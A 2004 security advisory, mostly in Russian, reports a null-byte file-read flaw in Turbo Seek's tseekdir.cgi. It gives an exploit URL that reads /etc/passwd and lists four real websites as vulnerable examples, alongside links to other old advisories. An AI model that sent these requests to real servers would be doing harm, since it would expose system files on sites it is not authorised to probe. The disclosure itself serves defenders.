Related information CGI bugs exploit in PHPBB 2010 Mambo Portal lasted version 4.5.1 (1.09) and lower vesion : SQL injection Vulnerability. ADVISORY: security hole (http response splitting) in snitz forums 2000 ADVISORY: http response splitting in snipsnap From:durito <durito_(at)_mail.ru> Date:10.09.2004Subject:Просмотр файлов в Search Engine & Directory Powered by Turbo Seek от FocalMedia.NetЗдравствуйте, 3APA3A. нашел новую узвимость. Просмотр файлов в Search Engine & Directory Powered by Turbo Seek от FocalMedia.Net Software / Application - Search Engine & Directory Powered by Turbo Seek Problem-Type - удаленная Vulnerability - возможность чтения файлов. Vendor - FocalMedia.Net http://www.focalmedia.net Risk / Severity - средний Platforms - *.nix Details / DESCRIPTION - Скрипт tseekdir.cgi не выполняет проверку на "null-byte poison". Exploit - http://www.xxx.com/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00 http://www.xxx.com/cgi-bin/tseekdir.cgi?id=799&location=/etc/passwd% 00 durito [durito@mail.ru] LwB Security Team [lwb57.org] Copyright 2002-2004 by LwB Security Team. All rights reserved. Пример: http://www.uscomputer.net/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00 http://www.micro2media.com/cgi-bin/turbo/tseekdir.cgi?location=/etc/passwd%00 http://www.clickonbanner.com/cgi-bin/search2/cgi/tseekdir.cgi?id=316&location=/etc/passwd% 00 http://www.americanquality.com/cgi-bin/tseekdir.cgi?id=799&location=/etc/passwd% 00 -- С уважением, durito [LwB Security Team] mailto:durito@mail.ru http://lwb57.org http://durito.narod.ru
CGI bugs
exploit in PHPBB 2010
Mambo Portal lasted version 4.5.1 (1.09) and lower vesion : SQL injection Vulnerability.
ADVISORY: security hole (http response splitting) in snitz forums 2000
ADVISORY: http response splitting in snipsnap
